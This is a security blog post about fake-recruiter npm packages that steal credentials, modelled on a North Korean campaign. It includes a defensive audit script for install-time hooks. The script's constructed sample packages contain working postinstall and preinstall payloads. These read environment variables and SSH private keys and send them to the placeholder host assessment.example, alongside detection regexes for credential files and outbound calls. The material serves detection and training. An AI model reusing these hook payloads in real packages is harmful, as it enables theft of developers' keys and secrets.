Tags: JavaScript, Python, Red Teaming, APT, Lazarus Group

When npm install Gets You Hacked: Simulating the Famous Chollima Job Scam Campaign

Fri, Jul 11, 2025 · 2 min read

A red team simulation inspired by North Korean APT group Famous Chollima, demonstrating how malicious npm packages can be weaponized in fake job recruitment campaigns targeting developers.

Introduction

In this post, we'll explore how threat actors can leverage the npm ecosystem to deliver malicious payloads through seemingly legitimate job recruitment campaigns. This technique has been used by real-world APT groups, making it a critical area of concern for developers and security professionals.

The Attack Vector

The attack begins with a fake job posting that requires candidates to install a specific npm package as part of the "technical assessment." The package looks legitimate, but its package.json declares a lifecycle script (preinstall, install or postinstall) that npm runs automatically during `npm install`, so the malicious code executes before the candidate has opened a single source file.

Step 1: The Bait

The attacker creates a convincing job posting on platforms like LinkedIn or job boards, targeting developers with specific skills. The posting includes instructions to install a package:

npm install @company/assessment-tool

Step 2: The Package

The malicious package contains code that:

  • Exfiltrates environment variables
  • Steals SSH keys and credentials
  • Establishes a backdoor connection
  • Performs lateral movement reconnaissance

Detection and Mitigation

Organizations should implement:

  • Package scanning and analysis, with particular attention to install-time lifecycle scripts (preinstall, install, postinstall), which run on `npm install` unless `--ignore-scripts` is set
  • Network monitoring for unexpected outbound connections from developer workstations and CI runners, especially ones that start during a package installation
  • Developer security training that covers recruiter-driven "take-home assessments" requiring candidates to install or run unvetted code
  • Least privilege access controls, so that a compromised developer machine does not expose long-lived cloud, registry or repository credentials through environment variables and dotfiles
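The following audit script ties the two halves of the post together: it models the install-time hook described under "The Package" and implements the first mitigation above, a scan that runs before `npm install` executes anything. It is an added example written for this page, not code from the original post or from any real campaign. The four packages it inspects are constructed samples; `@company/assessment-tool`, `assessment.example` and the file names are placeholders, and the indicator regexes are illustrative heuristics rather than a vetted signature set.

```javascript
// Added example: pre-install audit of an npm package (manifest + shipped files).
// Flags lifecycle hooks npm runs automatically and scans whatever they launch for
// the behaviour the post describes. All sample packages below are CONSTRUCTED;
// "assessment.example" and the file names are placeholders, not real indicators.

// Hooks npm runs during install: preinstall/install/postinstall for any registry
// dependency; prepare for git dependencies and a bare local `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Behavioural indicators, as regexes over script source text (heuristic, not exhaustive).
const INDICATORS = [
  { id: "env-dump", why: "reads environment variables", re: /process\.env\b/ },
  { id: "ssh-access", why: "touches SSH key material", re: /\.ssh\b|id_rsa|id_ed25519/ },
  { id: "cred-files", why: "reads credential files", re: /\.npmrc|\.aws\/credentials|\.netrc|\.git-credentials/ },
  { id: "outbound", why: "opens an outbound connection",
    re: /\brequire\(["'](https?|http2|net|dns|tls)["']\)|\bfetch\(|\b(https?|net|tls)\.(request|get|connect)\(/ },
  { id: "shell", why: "spawns a shell or process", re: /child_process|\b(exec|execSync|spawn|spawnSync)\(/ },
  { id: "eval", why: "evaluates code at runtime", re: /\beval\(|new Function\(|\bvm\.run/ },
];

const has = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// pkg = { manifest: <parsed package.json>, files: { "<path in tarball>": "<source>" } }
function auditPackage({ manifest, files = {} }) {
  const scripts = manifest.scripts || {};
  const hooks = [];
  for (const hook of INSTALL_HOOKS) {
    if (!has(scripts, hook)) continue;
    const command = scripts[hook];
    // Files the hook launches (e.g. "node setup.js") that ship inside the tarball.
    const launched = command.split(/\s+/).filter((t) => /\.[cm]?js$/.test(t) && has(files, t));
    // Scan the command string itself as well: inline `node -e "..."` payloads live there.
    const sources = [["<command>", command], ...launched.map((f) => [f, files[f]])];
    const findings = [];
    for (const [where, src] of sources) {
      for (const ind of INDICATORS) {
        if (ind.re.test(src)) findings.push({ where, id: ind.id, why: ind.why });
      }
    }
    hooks.push({ hook, command, launched, findings });
  }
  // No hooks: nothing runs at install time. Hooks without findings still need a human
  // look: native builds are legitimate, and obfuscated payloads evade regexes.
  let verdict = "ok";
  if (hooks.length > 0) verdict = hooks.some((h) => h.findings.length > 0) ? "block" : "review";
  return { name: manifest.name, verdict, hooks };
}

// Constructed sample modelled on the post's "assessment tool": a postinstall hook
// that collects environment variables and SSH keys and sends them out.
const SUSPICIOUS_PACKAGE = {
  manifest: { name: "@company/assessment-tool", version: "1.0.3", main: "index.js",
    scripts: { postinstall: "node setup.js", test: "node test.js" } },
  files: {
    "setup.js": [
      'const os = require("os"), fs = require("fs"), path = require("path"), https = require("https");',
      'const loot = { env: process.env, keys: {} };',
      'for (const f of ["id_rsa", "id_ed25519"]) {',
      '  const p = path.join(os.homedir(), ".ssh", f);',
      '  if (fs.existsSync(p)) loot.keys[f] = fs.readFileSync(p, "utf8");',
      '}',
      'const req = https.request({ host: "assessment.example", path: "/c", method: "POST" });',
      'req.end(JSON.stringify(loot));',
    ].join("\n"),
    "index.js": 'module.exports = { run: () => "assessment placeholder" };',
    "test.js": 'console.log("ok");',
  },
};

// Constructed sample: the whole payload is inline in the hook, no separate file to read.
const INLINE_PACKAGE = {
  manifest: { name: "@company/assessment-cli", version: "2.0.0",
    scripts: { preinstall: "node -e \"require('https').get('https://assessment.example/?d=' + encodeURIComponent(JSON.stringify(process.env)))\"" } },
  files: {},
};

// Constructed sample: a native addon. An install hook is expected here but still gets reviewed.
const NATIVE_PACKAGE = { manifest: { name: "fast-hash-native", version: "3.1.0", scripts: { install: "node-gyp rebuild" } }, files: {} };

// Constructed sample: no lifecycle hooks at all.
const CLEAN_PACKAGE = {
  manifest: { name: "tiny-pad", version: "0.1.0", main: "index.js", scripts: { test: "node test.js" } },
  files: { "index.js": "module.exports = (s, n) => s.padStart(n);", "test.js": "console.log('ok');" },
};

if (typeof require !== "undefined" && require.main === module) {
  for (const pkg of [SUSPICIOUS_PACKAGE, INLINE_PACKAGE, NATIVE_PACKAGE, CLEAN_PACKAGE]) {
    const r = auditPackage(pkg);
    console.log(`${r.name}: ${r.verdict}`);
    for (const h of r.hooks) for (const f of h.findings) console.log(`  ${h.hook} -> ${f.where}: ${f.why} (${f.id})`);
  }
}
```

To feed it a real package without running its scripts, download the tarball with `npm pack <name>` (or fetch it from the registry), unpack it, parse package.json and the files it references, and pass them in. Treat the result as a triage gate, not a verdict: string concatenation, hex escapes or a second-stage download will slip past these regexes, so a "review" or "block" still deserves an install in a disposable VM or container with egress blocked. The blanket control is `npm config set ignore-scripts true` (or `npm install --ignore-scripts`) on developer machines and CI, re-enabling scripts only for packages that are known to need them.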

Conclusion

This attack demonstrates the importance of vetting all dependencies, even those from seemingly legitimate sources. Always verify package sources and review code before installation.
